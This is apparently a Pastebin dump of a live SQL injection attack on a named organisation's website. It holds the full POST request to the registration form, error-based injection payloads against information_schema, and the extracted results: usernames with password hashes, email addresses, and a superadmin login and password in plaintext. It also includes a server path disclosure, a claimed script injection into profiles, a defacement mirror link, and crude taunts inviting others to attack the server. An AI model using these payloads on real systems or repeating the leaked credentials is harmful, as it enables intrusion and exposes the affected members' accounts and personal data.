Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Cox narahat sekilde mod_security ile qorunub.
- $_GET metodundaki injectionda mumkun deyil getmek injectionu.
- Amma $_POST metodla asagidaki kimi Tepeledik)
- |SELECT user_name, password FROM `members` WHERE user_name='sikdirde' order by 10-- AND 9='9' OR password='sikdirde' order by 10-- AND 9='9'|Unknown column '10' in 'order clause'
- =========================================================
- http://arm3a.org/index.php?go=registration&lang=en&act=insert
- METHOD POST:
- =========================================================
- HEADERS:
- Host: arm3a.org
- User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/17.0 Firefox/17.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- DNT: 1
- Connection: keep-alive
- Cookie: PHPSESSID=nrmdlu0n9scltvegj96idg1fj2; __utma=78176324.467657248.1354401113.1354401113.1354401113.1; __utmb=78176324.17.10.1354401113; __utmc=78176324; __utmz=78176324.1354401113.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CircleCookieTest=1
- Content-Type: multipart/form-data; boundary=---------------------------265001916915724
- Content-Length: 3019
- =========================================================
- REQUEST BODY:
- -----------------------------265001916915724\r\n
- Content-Disposition: form-data; name="first_name_en"\r\n
- \r\n
- '\r\n
- -----------------------------265001916915724\r\n
- Content-Disposition: form-data; name="last_name_en"\r\n
- \r\n
- '\r\n
- -----------------------------265001916915724\r\n
- Content-Disposition: form-data; name="patronymic_en"\r\n
- \r\n
- '\r\n
- -----------------------------265001916915724\r\n
- Content-Disposition: form-data; name="gender"\r\n
- \r\n
- 1\r\n
- -----------------------------265001916915724\r\n
- Content-Disposition: form-data; name="residence_country_id"\r\n
- \r\n
- 7\r\n
- -----------------------------265001916915724\r\n
- Content-Disposition: form-data; name="title_en"\r\n
- \r\n
- '\r\n
- -----------------------------265001916915724\r\n
- Content-Disposition: form-data; name="email"\r\n
- \r\n
- aaa@aaa.com\r\n
- -----------------------------265001916915724\r\n
- Content-Disposition: form-data; name="mobile"\r\n
- \r\n
- '\r\n
- -----------------------------265001916915724\r\n
- Content-Disposition: form-data; name="is_subscribed"\r\n
- \r\n
- 1\r\n
- -----------------------------265001916915724\r\n
- Content-Disposition: form-data; name="user_name"\r\n
- \r\n
- sikdirde' or (select floor(rand(0)*2) from(select count(*),concat((select concat(tabLE_NAME,0x7c) FROM INFORMATION_SCHEMA.TABLES where table_schema=database() LIMIT 1 offset 80),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1\r\n
- -----------------------------265001916915724\r\n
- Content-Disposition: form-data; name="password"\r\n
- \r\n
- sikdirde' order by 10-- AND 9='9\r\n
- -----------------------------265001916915724\r\n
- Content-Disposition: form-data; name="password_copy"\r\n
- \r\n
- sikdirde' order by 10-- AND 9='9\r\n
- -----------------------------265001916915724\r\n
- Content-Disposition: form-data; name="charter_accepted"\r\n
- \r\n
- 1\r\n
- -----------------------------265001916915724\r\n
- Content-Disposition: form-data; name="content_en"\r\n
- \r\n
- \r\n
- -----------------------------265001916915724\r\n
- Content-Disposition: form-data; name="tmp_date_birthdate"\r\n
- \r\n
- 02-12-2012\r\n
- -----------------------------265001916915724\r\n
- Content-Disposition: form-data; name="birthdate"\r\n
- \r\n
- 2012-12-02\r\n
- -----------------------------265001916915724\r\n
- Content-Disposition: form-data; name="personal_phone"\r\n
- \r\n
- \r\n
- -----------------------------265001916915724\r\n
- Content-Disposition: form-data; name="personal_address_en"\r\n
- \r\n
- \r\n
- -----------------------------265001916915724\r\n
- Content-Disposition: form-data; name="expertise_areas_en"\r\n
- \r\n
- \r\n
- -----------------------------265001916915724\r\n
- Content-Disposition: form-data; name="experience_en"\r\n
- \r\n
- \r\n
- -----------------------------265001916915724\r\n
- Content-Disposition: form-data; name="speciality_en"\r\n
- \r\n
- \r\n
- -----------------------------265001916915724\r\n
- Content-Disposition: form-data; name="scientific_degree_en"\r\n
- \r\n
- \r\n
- -----------------------------265001916915724\r\n
- Content-Disposition: form-data; name="university_en"\r\n
- \r\n
- \r\n
- -----------------------------265001916915724\r\n
- Content-Disposition: form-data; name="school_en"\r\n
- \r\n
- \r\n
- -----------------------------265001916915724\r\n
- Content-Disposition: form-data; name="hobby_en"\r\n
- \r\n
- \r\n
- -----------------------------265001916915724\r\n
- Content-Disposition: form-data; name="3_any_small"; filename=""\r\n
- Content-Type: application/octet-stream\r\n
- \r\n
- \r\n
- -----------------------------265001916915724\r\n
- Content-Disposition: form-data; name="save"\r\n
- \r\n
- Save\r\n
- -----------------------------265001916915724--\r\n
- ==============================================================
- payload:
- sikdirde' or (select floor(rand(0)*2) from(select count(*),concat((select concat(tabLE_NAME,0x7c) FROM INFORMATION_SCHEMA.columns where table_schema=database() and column_name='password' LIMIT 1 offset 0),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1\r\n
- helelik lazimli tablelar bele ki password columnu var bu table-larda.
- offset 0 ====== 123_users
- offset 1 ========= members
- offset 2 =========== members_backup
- offset 3 ================= organizations
- =============
- sikdirde' or (select floor(rand(0)*2) from(select count(*),concat((select concat(count(*),0x7c) FROM 123_users),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1\r\n
- 6
- =============
- sikdirde' or (select floor(rand(0)*2) from(select count(*),concat((select concat(column_name,0x7c) FROM information_schema.columns where table_name='123_users' limit 1 offset 6),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1\r\n
- id
- full_name
- user_name
- password
- email
- is_banned
- rank
- concat(id,0x7c,full_name,0x7c,user_name,0x7c,password,0x7c,email,0x7c,is_banned,0x7c,rank,0x7c) from 123_users
- =============
- sikdirde' or (select floor(rand(0)*2) from(select count(*),concat((select concat(user_name,0x7c,password,0x7c) FROM 123_users limit 1 offset 0),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1\r\n
- lilitkhalatyan|b7712161f4025c30f88ac2fd3e43f947
- suro@itnet.am
- kopaloni|2045f9c08a7676957e61e683658b2acd
- superadmin|4820ae2c8b5bca80656829e47e1ee0a4
- AnnaSayadyan|4a3f0aa47a96eb616286c626b4a9d36d
- animkrtchyan|b53599f87d9d0417b569c4a51288f764
- annag_at_mail_dot_ru|ed9fa1fb3337ef5a871e0302d6f1f5c6
- ========================================
- sikdirde' or (select floor(rand(0)*2) from(select count(*),concat((select concat(user_name,0x7c,id,0x7c) FROM members limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1\r\n
- gagikkarap
- gagikkarap 44444444
- gagikk@cit.am
- ========================================
- Login: superadmin
- pass: arm3a
- Admikani tapa bilmirem Fuck off)
- http://arm3a.org/members.php
- path Disclosure:
- /usr/local/www/apache22/www.arm3a.org/data/members.php
- ==========================================
- table: members
- given_email
- email
- ITIN
- password
- user_name
- rank
- is_logged_in
- 485 member var.
- sikdirde' or (select floor(rand(0)*2) from(select count(*),concat((select concat(column_name,0x7c) FROM information_schema.columns where table_name='members' limit 1 offset 84),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1\r\n
- son yuxaridaki offsetdir bu table-da.
- Plaintext pass userlerde)
- profile girib html/script inject oldu Fucked)
- http://arm3a.org/?lang=am&go=members
- http://arm3a.org/?lang=en&go=home http://zone-h.org/mirror/id/18683315
- Adminkani tapan olsa halal xosu mixlasin o servere.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement